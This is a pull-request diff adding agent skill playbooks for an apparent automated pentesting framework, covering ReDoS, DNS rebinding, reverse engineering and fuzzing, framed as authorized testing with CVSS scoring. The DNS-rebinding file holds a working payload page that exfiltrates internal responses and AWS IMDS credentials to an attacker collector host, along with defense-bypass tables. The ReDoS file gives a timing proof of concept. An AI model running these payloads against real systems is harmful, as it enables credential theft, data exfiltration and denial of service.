### PR TITLE
feat(skills): add deep-analysis, fuzzing, ReDoS, and DNS-rebinding playbooks

### DIFF
--- a/packages/decepticon/decepticon/skills/standard/analyst/redos/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/analyst/redos/SKILL.md
@@ -1,0 +1,227 @@
+---
+name: redos
+description: "Hunt ReDoS (CWE-1333, Catastrophic Backtracking) — identify regexes with nested quantifiers or overlapping alternation that cause super-linear matching time, trace tainted input paths to regex sinks, demonstrate timing PoC, and validate with response-time delta. Covers PCRE/RE2/V8/Python re engine differences. Triggers on: 'ReDoS', 'regex denial', 'catastrophic backtracking', 'redos', 'regex complexity', 'nested quantifiers', 'regex amplification', 'CWE-1333'."
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: reconnaissance
+  tags: redos, regex, dos, backtracking, cwe-1333, denial-of-service
+  mitre_attack: T1499.004
+---
+
+# ReDoS Hunting Playbook
+
+Regular Expression Denial of Service exploits O(2^n) or O(n^2) matching
+time in backtracking engines. One crafted string can peg a CPU thread for
+seconds or minutes against an otherwise tiny pattern.
+
+## 1. Identify Backtracking Engines in Scope
+
+Not all regex engines backtrack:
+
+| Engine | Language/Runtime | Backtracks? | Vulnerable? |
+|--------|----------------|-------------|-------------|
+| PCRE / PCRE2 | C, PHP, Apache, nginx | Yes | YES |
+| `re` module | Python (pre-3.11 `re`, `regex`) | Yes | YES |
+| `java.util.regex` | Java | Yes | YES |
+| `RegExp` | JavaScript / V8 | Yes | YES |
+| `System.Text.RegularExpressions` | .NET | Yes (w/ timeout option) | YES |
+| `regexp` package | Go | DFA-based (RE2) | NO |
+| `Oniguruma` | Ruby | Yes | YES |
+| RE2 | C++, re2 Python binding | DFA-based | NO |
+
+If the target uses RE2 or Go's `regexp`, skip this playbook — no
+backtracking, no ReDoS.
+
+## 2. Source Patterns — Where Tainted Input Reaches Regex
+
+```bash
+# Python
+grep -rn 're\.match\|re\.search\|re\.fullmatch\|re\.compile\|regex\.match' /workspace/src \
+  | grep -v '#' | grep -v 'test_' | grep -v '_test\.py'
+
+# Node.js / TypeScript
+grep -rn 'new RegExp\|\.match(\|\.search(\|\.test(' /workspace/src \
+  --include='*.js' --include='*.ts' | grep -v 'node_modules'
+
+# Java
+grep -rn 'Pattern\.compile\|\.matches(\|\.find(\|String\.matches' /workspace/src \
+  --include='*.java'
+
+# PHP
+grep -rn 'preg_match\|preg_replace\|preg_split' /workspace/src --include='*.php'
+
+# Ruby
+grep -rn 'match\|=~\|Regexp\.new\|\.scan(' /workspace/src --include='*.rb' \
+  | grep -v '#'
+
+# Semgrep for tainted-input-to-regex-sink
+semgrep --config p/regex /workspace/src --sarif -o /workspace/sem-redos.sarif 2>/dev/null
+```
+
+For each hit, determine whether the regex pattern is:
+- **Static** (hardcoded string literal) → scan the pattern itself
+- **Dynamic** (constructed from user input) → separate vuln class (regex injection);
+  flag it and continue
+
+## 3. Catastrophic Pattern Recognition
+
+A regex is potentially catastrophic if it can match the same character
+through multiple paths. The two canonical forms:
+
+### Form 1: Nested quantifiers
+`(a+)+`, `(a*)*`, `([a-z]+)+`, `(a|a)+`
+
+The inner group can match one character in multiple ways → exponential
+backtracking on a string like `aaaa...b`.
+
+### Form 2: Overlapping alternation
+`(a|aa)+`, `(a|ab)+c`, `(x+|y+)+z`
+
+Two branches can match the same prefix → exponential when neither
+eventually matches the suffix.
+
+### Quick pattern scanner
+```bash
+# Find potentially catastrophic regexes (grep heuristic)
+grep -rn "$(printf \
+  '(\([^)]*[+*][^)]*\)[+*])\|(\([^)]*|\[^)]*\)[+*])\|(\([^)]*[+*]\)\{[2-9]\})')" \
+  /workspace/src 2>/dev/null | grep -v 'node_modules\|\.min\.js'
+
+# Better: use vuln-regex-detector (if available)
+python3 -c "
+import subprocess, json, os, sys
+# Try to find all regex literals in Python files
+import ast, glob
+for path in glob.glob('/workspace/src/**/*.py', recursive=True):
+    try:
+        tree = ast.parse(open(path).read())
+        for node in ast.walk(tree):
+            if isinstance(node, ast.Call):
+                fn = getattr(node.func, 'attr', '') or getattr(node.func, 'id', '')
+                if fn in ('compile','match','search','fullmatch'):
+                    for arg in node.args:
+                        if isinstance(arg, ast.Constant) and isinstance(arg.value, str):
+                            print(path, node.lineno, repr(arg.value))
+    except Exception:
+        pass
+" 2>/dev/null | head -50
+```
+
+Patterns warranting deeper analysis (flag these):
+- Any group with a quantifier inside a quantifier: `(X+)+`, `(X*)+`, `(X+)*`
+- Alternation where branches share a prefix: `(ab|a)+`, `(abc|ab)+`
+- Long character classes under a star inside a group under a star: `([a-z ]+)+`
+
+## 4. Taint Heuristics — Is This Reachable?
+
+For each flagged regex, trace whether attacker-controlled data reaches the
+`pattern`, the `string` argument, or both:
+
+1. `string` tainted, `pattern` static → ReDoS possible if pattern is vulnerable
+2. `pattern` tainted → also check for Regex Injection (attacker adds their own
+   quantifiers → instant ReDoS)
+3. Both tainted → highest risk
+
+For web endpoints, check:
+- URL path / query param → regex for routing or validation
+- HTTP body field → input validation regex
+- Header (User-Agent, Content-Type) → server-side validation
+
+## 5. Timing PoC Construction
+
+A valid PoC must demonstrate measurable time difference between a benign
+and a malicious input against the same endpoint.
+
+### Evil string generation
+
+For a vulnerable pattern `(a+)+$` on a string of length n:
+- Malicious: `"a" * n + "b"` (forces full backtracking on the trailing `b`)
+- Benign: `"a" * n` (matches instantly)
+
+General evil-string construction:
+1. Identify the "pump" character (what the repeating group matches)
+2. Append a character that breaks the match at the end
+3. Scale the pump length until response time > 3× normal
+
+```python
+import time, requests
+
+TARGET = "https://<TARGET>/api/validate"
+PUMP = "a"
+FAIL = "!"
+
+for n in [10, 100, 500, 1000, 5000, 10000]:
+    evil = PUMP * n + FAIL
+    benign = PUMP * n
+
+    t0 = time.time(); requests.post(TARGET, json={"input": benign},  timeout=30); t_benign = time.time()-t0
+    t0 = time.time(); requests.post(TARGET, json={"input": evil},    timeout=30); t_evil   = time.time()-t0
+
+    print(f"n={n}: benign={t_benign:.3f}s  evil={t_evil:.3f}s  ratio={t_evil/max(t_benign,0.001):.1f}x")
+    if t_evil > 3.0:
+        print(">> CONFIRMED REDOS — halting to avoid DoS")
+        break
+```
+
+## 6. Validate Finding Contract
+
+Use `validate_finding` with:
+
+```
+success_patterns:
+  - "<time_evil> > 2.0"        # or match pattern in response body if timed-out
+  - "Response time delta > 2s"
+
+negative_command: same request with a short benign input (n=5)
+negative_patterns: ["< 0.1s", "< 0.5s"]
+```
+
+Minimum bar for a valid ReDoS finding:
+- Malicious input takes ≥ 3× longer than benign input of similar length
+- Time scales super-linearly with input length (not just 3× at n=100)
+- The pattern is reachable without authentication, OR the impact is
+  amplified by concurrent requests (even authenticated paths can be DoS)
+
+## 7. Engine-Specific Notes
+
+### JavaScript (V8)
+V8 added backtrack-limit mitigations in Node 16+ and Chrome 93+
+(`RegExp.prototype.exec` timeout, but controllable via `--max-old-space-size`).
+Still exploitable with long inputs or on older Node versions.
+
+### Python `re`
+No backtrack limit by default. `re.fullmatch` on complex patterns blocks
+the event loop in async frameworks (FastAPI, aiohttp) — single thread DoS.
+Test with: `python3 -c "import re,time; t=time.time(); re.match(r'(a+)+$','a'*25+'b'); print(time.time()-t,'s')"`.
+
+### Java `java.util.regex`
+Thread-blocking. Servlet containers / Spring endpoints that call
+`Pattern.matches(taintedOrBadPattern, input)` without timeout will pin a
+thread. Test with `StopWatch` timing.
+
+### PHP `preg_match`
+Has `pcre.backtrack_limit` (default 1000000) and `pcre.recursion_limit`
+(default 100000). Hitting limits returns `false` (not an error by default),
+but causes CPU spike before the limit kicks in.
+
+## 8. Default CVSS
+
+| Scenario | CVSS | Score |
+|----------|------|-------|
+| Unauthenticated endpoint, n=10K → 10s+ | AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H | 7.5 |
+| Authenticated, single user DoS | AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H | 6.5 |
+| Async framework (entire event loop blocked) | AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H | 8.6 |
+
+## 9. Chain Promotion
+
+ReDoS alone is a DoS primitive. Promote via:
+- `enables` edge to availability impact node
+- If the endpoint is in a critical auth or payment path → escalate severity
+- If the regex also leaks match groups (regex injection) → dual vuln class
+
+```
+kg_add_node("vulnerability", "ReDoS in /api/validate::input",
+  props={"pattern": "(a+)+$", "file": "api/validators.py", "line": 42,
+         "cwe": "CWE-1333", "evil_input_len": 10000, "evil_time_s": 12.3,
+         "key": "redos:api-validate-input"})
+```

--- a/packages/decepticon/decepticon/skills/standard/exploit/web/dns-rebinding/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/exploit/web/dns-rebinding/SKILL.md
@@ -1,0 +1,222 @@
+---
+name: dns-rebinding
+description: "DNS rebinding attack to bypass browser same-origin policy and reach IMDS/localhost/internal services: TTL=0 rebind mechanics, rbndr.us/singularity tooling, browser DNS cache pinning, chaining into AWS/GCP/Azure IMDS credential pivot. Use when SSRF is blocked but a victim browser can be induced to make requests, or when a localhost service is exposed. Triggers on: 'dns rebinding', 'rebind', 'DNS TTL 0', 'singularity', 'rbndr', 'localhost bypass via browser', 'imds via browser', 'SSRF via DNS'."
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: execution
+  tags: dns-rebinding, ssrf, imds, browser, localhost, same-origin-policy, cors
+  mitre_attack: T1557, T1190
+---
+
+# DNS Rebinding
+
+DNS rebinding lets an attacker-controlled page make the victim's browser
+treat `attacker.com` as if it were `127.0.0.1` (or any internal IP).
+The browser's same-origin policy checks the hostname, not the IP — so
+after rebinding, the page's JS can read responses from the internal
+service as if they were same-origin.
+
+## When This Applies
+
+| Scenario | Viable? |
+|----------|---------|
+| SSRF blocked, but victim browser is reachable | Yes — browser does the internal fetch |
+| Localhost service (Electron app, dev server, K8s dashboard) | Yes — browser calls 127.0.0.1:<PORT> |
+| Cloud IMDS (169.254.169.254) reachable from instance's browser | Yes — rare but critical |
+| Server-side SSRF filter allows `attacker.com` | Yes — rebind to internal IP |
+| Target has DNS-rebinding protection (Host header check) | Partial — see bypass §7 |
+
+## 2. Attack Mechanics
+
+### Phase 1 — Victim resolves attacker.com → public IP
+Victim visits `http://attacker.com/payload.html`. Browser resolves the
+DNS name → gets the attacker's real public IP → same-origin allows
+the page's JS to load and execute.
+
+### Phase 2 — TTL expires, DNS flips to 127.0.0.1
+The attacker's DNS server returns a very short TTL (0–1 s). After TTL
+expiry, a second DNS query returns `127.0.0.1` (or target internal IP).
+
+### Phase 3 — JS makes same-origin request
+The page's JS calls `fetch("http://attacker.com/api/v1/secret")`.
+The browser re-resolves `attacker.com` → gets `127.0.0.1` → sends
+the request to the local service on the attacker's behalf, receives the
+response, and exfiltrates it.
+
+```
+[Browser] → DNS query: attacker.com → [Attacker DNS] → 1.2.3.4 (real)
+                                         ... wait TTL ...
+[Browser] → DNS query: attacker.com → [Attacker DNS] → 127.0.0.1 (rebind)
+[Browser] fetch("http://attacker.com:8080/api/secret") → [127.0.0.1:8080]
+[Browser] → response body exfiltrated to attacker
+```
+
+## 3. Tooling
+
+### rbndr.us (fastest, no setup)
+Public DNS rebinding service by Taviso. Construct a hostname that encodes
+both IPs:
+
+```
+<hex-public-ip>.<hex-target-ip>.rbndr.us
+```
+
+Example — rebind `attacker.com` from `1.2.3.4` to `127.0.0.1`:
+```bash
+PUBLIC_HEX=$(python3 -c "import socket; a='<YOUR_VPS_IP>'; print(''.join(f'{int(x):02x}' for x in a.split('.')))")
+TARGET_HEX="7f000001"   # 127.0.0.1
+REBIND_HOST="${PUBLIC_HEX}.${TARGET_HEX}.rbndr.us"
+echo "Rebind hostname: $REBIND_HOST"
+# → e.g. 01020304.7f000001.rbndr.us
+```
+
+The rbndr.us server alternates between the two IPs on each DNS request.
+Set up your payload page at `http://$REBIND_HOST:8080/`.
+
+### Singularity (full-featured, self-hosted)
+```bash
+git clone https://github.com/nccgroup/singularity /workspace/singularity
+cd /workspace/singularity/html
+
+# Configure the manager
+# Edit cmd/singularity-server/main.go: set rebindingFn to "rr" (round-robin)
+# or "fs" (first satisfied)
+
+docker run -it --rm \
+  -p 53:53/udp -p 8080:8080 \
+  nccgroup/singularity
+
+# Access the manager at http://<VPS>:8080/manager.html
+# Set "Attack host" = attacker's public IP
+# Set "Target host" = 127.0.0.1 (or internal IP)
+# Set "Target port" = target port (e.g. 2375 for Docker, 6443 for K8s)
+# Generate the attack URL; deliver to victim
+```
+
+## 4. Payload Page
+
+Minimal JS to fetch once rebinding succeeds:
+
+```html
+<!DOCTYPE html>
+<html>
+<body>
+<script>
+const host = location.hostname;   // e.g. xxxx.7f000001.rbndr.us
+const target = "http://" + host + ":<TARGET_PORT>/";
+const exfil  = "https://<ATTACKER_COLLECTOR>/";
+
+function tryFetch(attempt) {
+    fetch(target, {cache: "no-store"})
+        .then(r => r.text())
+        .then(body => {
+            // Got internal service response — exfiltrate
+            fetch(exfil + "?d=" + btoa(body).slice(0,1000));
+        })
+        .catch(err => {
+            // DNS hasn't flipped yet, retry
+            if (attempt < 30) setTimeout(() => tryFetch(attempt+1), 1000);
+        });
+}
+
+setTimeout(() => tryFetch(0), 500);  // give first TTL a moment to expire
+</script>
+</body>
+</html>
+```
+
+For IMDS specifically, AWS v1 and GCP do not require special headers from
+the browser perspective — the only protection is Host header validation
+(see §7). Azure IMDS requires `Metadata: true` header — inject via:
+```javascript
+fetch(target, {headers: {"Metadata": "true"}, cache: "no-store"})
+```
+
+## 5. Cloud IMDS Pivot
+
+Once the rebinding hits `169.254.169.254`:
+
+```javascript
+// AWS IMDSv1 — enumerate IAM role
+fetch("http://attacker.com/latest/meta-data/iam/security-credentials/", {cache:"no-store"})
+  .then(r => r.text())
+  .then(role => {
+    fetch("http://attacker.com/latest/meta-data/iam/security-credentials/" + role.trim(), {cache:"no-store"})
+      .then(r => r.text())
+      .then(creds => fetch(exfil + "?c=" + btoa(creds)));
+  });
+```
+
+Extraction yields `AccessKeyId`, `SecretAccessKey`, `Token` — full
+AWS credential pivot. Treat as equivalent to SSRF → IMDSv1 (Critical).
+
+## 6. Electron / Desktop App Attack
+
+Many Electron apps serve a local HTTP or WebSocket server on
+`127.0.0.1:<PORT>` without authentication, relying on same-origin for
+isolation. DNS rebinding bypasses that entirely:
+
+1. Enumerate the app's local port (scan or read its config file if accessible)
+2. Rebind to `127.0.0.1:<port>` using rbndr.us
+3. Read API responses, extract tokens/auth cookies, pivot to backend
+
+Target ports by app:
+| App | Default port |
+|-----|-------------|
+| VS Code remote | 9229 |
+| Docker Desktop API | 2375 |
+| Kubernetes API | 6443 / 8001 |
+| etcd | 2379 |
+| Jupyter Notebook | 8888 |
+| Kibana | 5601 |
+| Redis | 6379 |
+
+## 7. Defenses and Bypasses
+
+| Defense | Bypass |
+|---------|--------|
+| Host header check (`if Host != expected`) | Try `X-Forwarded-Host`, `X-Host`, empty Host |
+| DNS pinning (browser caches first IP) | Wait for pin to expire (Chrome: 60s); switch to fresh tab |
+| Private network access (PNA) headers | Older browsers lack PNA support; Safari doesn't implement it |
+| IMDSv2 (token-required) | Browser can't set `X-aws-ec2-metadata-token-ttl-seconds` — v2 often blocks |
+| CORS `Access-Control-Allow-Origin` | CORS is about responses — rebinding bypasses by making origin `==` target |
+
+Browser DNS cache TTLs:
+- Chrome: ignores TTL if < 1s (pins for ~1min); use rbndr TTL of 1s
+- Firefox: respects TTL=0 more reliably
+- Safari: similar to Firefox
+
+## 8. PoC Evidence Checklist
+
+To file a valid finding:
+- [ ] Demonstrate victim browser receives response from internal target
+- [ ] Show the exfiltrated data (e.g. base64-decoded IMDS response)
+- [ ] Record DNS TTL used and browser version
+- [ ] Show that without the rebind (direct access) the same request fails
+
+## 9. CVSS
+
+| Variant | CVSS vector | Score |
+|---------|-------------|-------|
+| DNS rebind → unauthenticated localhost service (DoS) | AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H | 5.3 |
+| DNS rebind → internal API data leak | AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:N/A:N | 7.4 |
+| DNS rebind → IMDSv1 IAM credentials | AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H | 9.0 |
+| DNS rebind → Docker socket → RCE | AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H | 9.0 |
+
+AC:H reflects the requirement for victim interaction (keeping the tab
+open during the TTL expiry window).
+
+## 10. Chain Promotion
+
+DNS rebinding is usually a delivery primitive — chain it:
+- `enables` edge to IMDS credential node (if IMDS pivot succeeded)
+- `enables` edge to internal service vuln (if internal service is exploitable)
+- `requires` edge from "victim interaction" precondition node
+
+```
+kg_add_node("vulnerability", "DNS rebinding → IMDS credential pivot",
+  props={"attack_host": "<REBIND_HOST>", "target_ip": "169.254.169.254",
+         "browser": "Chrome 124", "imds_role": "<ROLE_NAME>",
+         "exfil_method": "fetch to attacker callback",
+         "key": "dns-rebinding:imds-pivot"})
+```

--- a/packages/decepticon/decepticon/skills/standard/reverser/deep-analysis/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/reverser/deep-analysis/SKILL.md
@@ -1,0 +1,234 @@
+---
+name: deep-analysis
+description: "Depth-first RE investigation loop for a single binary or function cluster: decompile→rename→retype→comment→re-read, with context-rot guards and on-task checks. Use when triage has already identified the interesting area and the goal is full understanding: what does function X do, identify cryptographic primitives, locate C2 protocol, recover data structures. Triggers on: 'deep analysis', 'understand function', 'recover struct', 'crypto identification', 'C2 protocol', 'reverse this binary fully', 'what does this function do'."
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: reconnaissance
+  tags: reverse-engineering, ghidra, decompilation, static-analysis, deep-re
+  mitre_attack: T1027, T1055, T1129
+---
+
+# Deep Binary Analysis Loop
+
+Depth-first RE for full understanding of a specific target area. Distinct from
+breadth-first triage (`reverser/triage`) — here you don't stop at a signal,
+you keep iterating until the function is fully understood.
+
+## Core Principle: Narrow → Deep
+
+Triage finds the surface; deep-analysis excavates one shaft. Commit to one
+question at a time. Context-rot (losing track of what you've already renamed
+or retyped) is the primary failure mode — guard against it explicitly.
+
+## 1. Entry Point
+
+Before decompiling anything, state the question in writing:
+
+```
+kg_add_node("hypothesis", "deep-analysis target",
+  props={"question": "<exact question, e.g. 'what does sub_401A20 do'>",
+         "binary": "/workspace/target",
+         "entry_function": "<hex addr or name>",
+         "key": "deep-analysis:entry"})
+```
+
+Commit to one question. Do not pivot mid-session unless the current
+function is fully annotated and the answer is "it delegates to X".
+
+## 2. Decompile→Rename→Retype→Comment Loop
+
+For each function under analysis, follow this cycle exactly:
+
+### 2a. Decompile
+```
+ghidra_decompile(binary="/workspace/target", function="<addr_or_name>")
+```
+Read the full output before touching anything.
+
+### 2b. Rename all locals and parameters
+As soon as you understand a variable's purpose, rename it immediately:
+```bash
+# Via Ghidra MCP batch rename (preferred — one round trip)
+# collect all your renames first, then batch:
+ghidra_batch_rename(binary="/workspace/target", renames={
+  "sub_401A20": "decrypt_config_blob",
+  "local_18": "key_len",
+  "param_1": "encrypted_buf",
+  "param_2": "buf_len"
+})
+```
+Do not leave a decompiled function with placeholder names (`param_1`,
+`local_8`, `uVar1`) if you know what they are.
+
+### 2c. Retype parameters and locals
+Correct types catch bugs in decompiler reasoning:
+```bash
+# If param_1 is char* not int
+ghidra_retype(binary="/workspace/target", symbol="decrypt_config_blob::param_1", type="char *")
+ghidra_retype(binary="/workspace/target", symbol="decrypt_config_blob::local_18", type="uint32_t")
+```
+Pay special attention to: size_t vs int (sign confusion), pointer-as-int
+patterns, struct pointer vs void*, callback function pointers.
+
+### 2d. Add inline comments
+At every branch point whose purpose is now understood:
+```bash
+ghidra_set_comment(binary="/workspace/target", address="0x401A3C",
+  comment="XOR-decrypts single byte: key[i % key_len] ^ buf[i]")
+```
+
+### 2e. Re-read the decompilation
+After rename+retype, decompile again. The output will often look
+dramatically cleaner and reveal previously hidden logic.
+
+Repeat 2a–2e until the function's purpose is unambiguous.
+
+## 3. On-Task Check (every 3–5 tool calls)
+
+After each batch of tool calls, answer explicitly:
+
+1. Is the current function still the right place to dig?
+2. Have I renamed every local/param I now understand?
+3. Have I documented what this function does (even partially) in the KG?
+4. Am I still working toward the original question, or have I drifted?
+
+If you've called into a callee 3+ levels deep without updating the KG,
+that's context-rot — surface the findings upward before going deeper.
+
+```
+kg_add_node("note", "deep-analysis progress",
+  props={"function": "decrypt_config_blob",
+         "finding": "RC4 variant — XOR stream cipher, 16-byte key from .rdata:0x40D0C0",
+         "status": "complete",
+         "key": "deep-analysis:decrypt_config_blob"})
+```
+
+## 4. Per-Question Strategies
+
+### "What does function X do?"
+
+1. Decompile X.
+2. List all callees: `ghidra_xrefs(binary=..., address=X)`.
+3. For each callee, check if it's a library stub (look up import table) or
+   custom code. Library stubs → infer semantics from function name. Custom
+   code → recurse one level.
+4. Draw the call path as a KG `calls` edge chain.
+5. Answer: input/output contract, side effects, return value semantics.
+
+### "Identify crypto primitive"
+
+High-entropy constants are the fastest path:
+```bash
+# Search for known crypto constants (AES S-box, RC4 init, ChaCha sigma, etc.)
+grep -r "0x63636363\|0x6B617479\|0xE2280613\|0xDB3D18\|0x61707865\|0x3320646E" \
+  /workspace/target.bin 2>/dev/null || true
+
+# Capa identifies crypto more reliably
+capa /workspace/target --json > /workspace/capa_crypto.json
+cat /workspace/capa_crypto.json | python3 -c "
+import json, sys
+d = json.load(sys.stdin)
+for r in d.get('rules', {}).values():
+    if 'crypto' in r.get('rule',{}).get('namespace','').lower():
+        print(r['rule']['name'])
+"
+```
+
+Constants to recognize:
+| Constant | Algorithm |
+|----------|-----------|
+| `0x61707865` / `expand 32-byte k` | ChaCha20 / Salsa20 |
+| AES S-box start `0x63,0x7c,0x77,0x7b` | AES |
+| `0x67452301,0xEFCDAB89` | MD5 init |
+| `0x6A09E667,0xBB67AE85` | SHA-256 init |
+| `0x9E3779B9` | TEA / XTEA Δ |
+| `0xB7E15163,0x9E3779B9` | RC5/RC6 magic |
+| Byte-by-byte XOR loop with index-mod key | RC4 or custom XOR |
+
+Once identified, rename the function accordingly and document the key
+schedule location if observable.
+
+### "Find C2 protocol / config decryption"
+
+1. Start from network sinks: search imports for `connect`, `WSAConnect`,
+   `send`, `write`, `curl_easy_perform`.
+2. Follow xrefs upward from the sink to find the function that builds the
+   buffer — that's likely the protocol serializer.
+3. Look for the decryption stub called at startup or on first network
+   connect — it usually reads from a hardcoded blob in `.data` or `.rdata`.
+4. Identify config blob location:
+   ```bash
+   # Find all large-ish .rdata blobs (>16 bytes, high entropy)
+   python3 -c "
+   import pefile, math
+   pe = pefile.PE('/workspace/target.exe')
+   for s in pe.sections:
+       if b'.rdata' in s.Name:
+           data = s.get_data()
+           # scan in 16-byte windows
+           for off in range(0, len(data)-16, 4):
+               chunk = data[off:off+16]
+               counts = [chunk.count(bytes([b])) for b in range(256)]
+               ent = -sum((c/16)*math.log2(c/16) for c in counts if c)
+               if ent > 7.0:
+                   print(hex(s.VirtualAddress + off), 'entropy', round(ent,2))
+   " 2>/dev/null | head -20
+   ```
+5. Decompile the decrypt stub. Rename it `decrypt_c2_config`. Document
+   algorithm + key in KG.
+
+## 5. Struct Recovery
+
+When you see pointer arithmetic into a struct you don't have a definition for:
+
+1. Note the maximum offset accessed (e.g. `[param_1 + 0x28]`).
+2. Create a Ghidra struct: `ghidra_create_struct(name="Config", size=0x30)`.
+3. Add fields as you discover their types:
+   ```
+   ghidra_add_field(struct="Config", offset=0x00, type="char[16]", name="key")
+   ghidra_add_field(struct="Config", offset=0x10, type="char[64]", name="c2_host")
+   ghidra_add_field(struct="Config", offset=0x50, type="uint16_t", name="c2_port")
+   ```
+4. Apply the struct type to all uses of param_1.
+5. Re-decompile — member names will appear in the pseudocode.
+
+## 6. Context-Rot Prevention Rules
+
+- Never go more than 3 callees deep without writing a KG note.
+- If you have renamed 5+ functions, update the entry hypothesis with a
+  "state_so_far" field.
+- If a function's purpose is "unclear after full loop", mark it `status:blocked`
+  and surface to orchestrator rather than spiraling.
+- Keep a breadcrumb: before entering a callee, record the parent and
+  what you expect to learn from the callee.
+
+## 7. Completion Gate
+
+The deep-analysis session is done when:
+- The original question is answered and documented in KG
+- All functions touched have at least a rename + one-line comment
+- Crypto primitives identified (or confirmed absent)
+- C2 config location/format documented (if applicable)
+- Struct definitions created for all major data types
+
+```
+kg_add_node("finding", "deep-analysis complete",
+  props={"question": "<original question>",
+         "answer": "<concise answer>",
+         "key_functions": ["decrypt_config_blob", "build_beacon_packet"],
+         "crypto": "ChaCha20 — key at .data:0x40E0A0",
+         "c2_format": "TLV over TCP port 4444",
+         "key": "deep-analysis:complete"})
+```
+
+## Tools
+
+| Tool | Purpose |
+|------|---------|
+| `ghidra_decompile` | C pseudocode for a function |
+| `ghidra_batch_rename` | Rename multiple symbols in one call |
+| `ghidra_retype` | Fix type annotations |
+| `ghidra_xrefs` | Callers / callees of an address |
+| `ghidra_create_struct` | Define a data structure |
+| `capa` | High-level capability + crypto detection |
+| `pefile` / `lief` | PE/ELF structure access from Python |

--- a/packages/decepticon/decepticon/skills/standard/reverser/fuzzing/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/reverser/fuzzing/SKILL.md
@@ -1,0 +1,273 @@
+---
+name: fuzzing
+description: "Coverage-guided fuzzing methodology for compiled binaries and libraries: target scoping, fuzzer selection (AFL++/libFuzzer/Honggfuzz), harness skeleton, ASan+UBSan flags, corpus curation, crash triage and minimization (afl-tmin/minimize_corpus), exploitability rubric. Outputs corpora and crashes to /workspace/. Triggers on: 'fuzz', 'fuzzing', 'AFL', 'libFuzzer', 'harness', 'crash triage', 'coverage-guided', 'afl-tmin', 'sanitizer', 'corpus'."
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: reconnaissance
+  tags: fuzzing, afl++, libfuzzer, honggfuzz, asan, harness, crash-triage
+  mitre_attack: T1587.004, T1203
+---
+
+# Coverage-Guided Fuzzing Playbook
+
+Find memory-corruption and logic bugs by systematically mutating inputs
+while tracking code coverage. Works on parsers, network protocol
+handlers, file format readers, crypto implementations.
+
+## 1. Target Scoping
+
+Before writing a harness, answer:
+- What is the attack surface? (file parser / network socket / library API)
+- What input format does the target consume? (binary struct / text / TLV)
+- Is source available? (instrumented build) or binary-only? (QEMU/Frida mode)
+
+```bash
+# Quick API surface for a library
+nm -D /workspace/target.so | grep ' T ' | awk '{print $3}' | sort > /workspace/exports.txt
+# or via radare2
+r2 -q -e bin.demangle=true -c "aaa; afl~pub" /workspace/target.so 2>/dev/null | head -40
+```
+
+## 2. Fuzzer Selection
+
+| Scenario | Fuzzer | Rationale |
+|----------|--------|-----------|
+| Source available, C/C++ | AFL++ | Best coverage feedback, mutator ecosystem |
+| Source available, any lang | libFuzzer | In-process, lower overhead, LLVM native |
+| Binary-only | AFL++ QEMU mode | `AFL_USE_QEMU=1` |
+| Binary-only (faster) | AFL++ Frida mode | Lighter than QEMU on some targets |
+| Multi-CPU farm | AFL++ + honggfuzz | honggfuzz for socket fuzzing |
+| Go / Rust | native `go-fuzz` / `cargo fuzz` | Language-native instrumentation |
+| Network protocol daemon | AFL++ persistent + preeny | Desock the accept() loop |
+
+## 3. Instrumented Build (source-available)
+
+```bash
+# AFL++
+CC=afl-clang-fast CXX=afl-clang-fast++ \
+  cmake -DCMAKE_BUILD_TYPE=Debug \
+        -DCMAKE_C_FLAGS="-fsanitize=address,undefined -g -O1" \
+        -DCMAKE_CXX_FLAGS="-fsanitize=address,undefined -g -O1" \
+        -S /workspace/src -B /workspace/build-afl
+cmake --build /workspace/build-afl -j$(nproc)
+
+# libFuzzer (alternative)
+CC=clang CXX=clang++ \
+  cmake -DCMAKE_BUILD_TYPE=Debug \
+        -DCMAKE_C_FLAGS="-fsanitize=fuzzer,address,undefined -g" \
+        -DCMAKE_CXX_FLAGS="-fsanitize=fuzzer,address,undefined -g" \
+        -S /workspace/src -B /workspace/build-lf
+cmake --build /workspace/build-lf -j$(nproc)
+```
+
+Minimum sanitizer flags: `-fsanitize=address,undefined`. Add
+`-fsanitize=memory` (MSan) on a separate build for uninit reads.
+Do NOT combine MSan with ASan — they conflict.
+
+## 4. Harness Skeleton
+
+### AFL++ persistent-mode harness (C)
+```c
+/* harness.c — compile with afl-clang-fast */
+#include <stdint.h>
+#include <string.h>
+
+/* Include target headers */
+#include "target_api.h"
+
+/* AFL++ persistent mode — loops inside the same process (~20x faster) */
+__AFL_FUZZ_INIT();
+
+int main(void) {
+    __AFL_INIT();
+    const uint8_t *buf = __AFL_FUZZ_TESTCASE_BUF;
+    while (__AFL_LOOP(10000)) {
+        size_t len = __AFL_FUZZ_TESTCASE_LEN;
+        /* Call the target function directly */
+        target_parse(buf, len);   /* replace with actual API */
+    }
+    return 0;
+}
+```
+
+### libFuzzer target (C)
+```c
+/* fuzz_target.cc */
+#include <stdint.h>
+#include <stddef.h>
+#include "target_api.h"
+
+extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
+    /* Wrap any setup in thread_local or static init if needed */
+    target_parse(data, size);
+    return 0;  /* non-zero aborts fuzzer */
+}
+```
+
+Key harness rules:
+- Allocate nothing that leaks between iterations (use arena or reset)
+- Do not call `exit()` or `abort()` inside the harness — let ASan terminate
+- Minimize initialization overhead outside the fuzz loop
+- If target needs a null-terminated string: `strndup((char*)data, size)`
+
+## 5. Seed Corpus Curation
+
+```bash
+# Create corpus dir
+mkdir -p /workspace/corpus/initial
+
+# If target is a file parser, seed with real samples
+find /usr/share -name "*.png" 2>/dev/null | head -10 | \
+  xargs -I{} cp {} /workspace/corpus/initial/
+
+# For binary protocols, create minimal valid inputs by hand
+# For text protocols, minimal valid requests:
+printf 'GET / HTTP/1.0\r\n\r\n' > /workspace/corpus/initial/http_get.bin
+
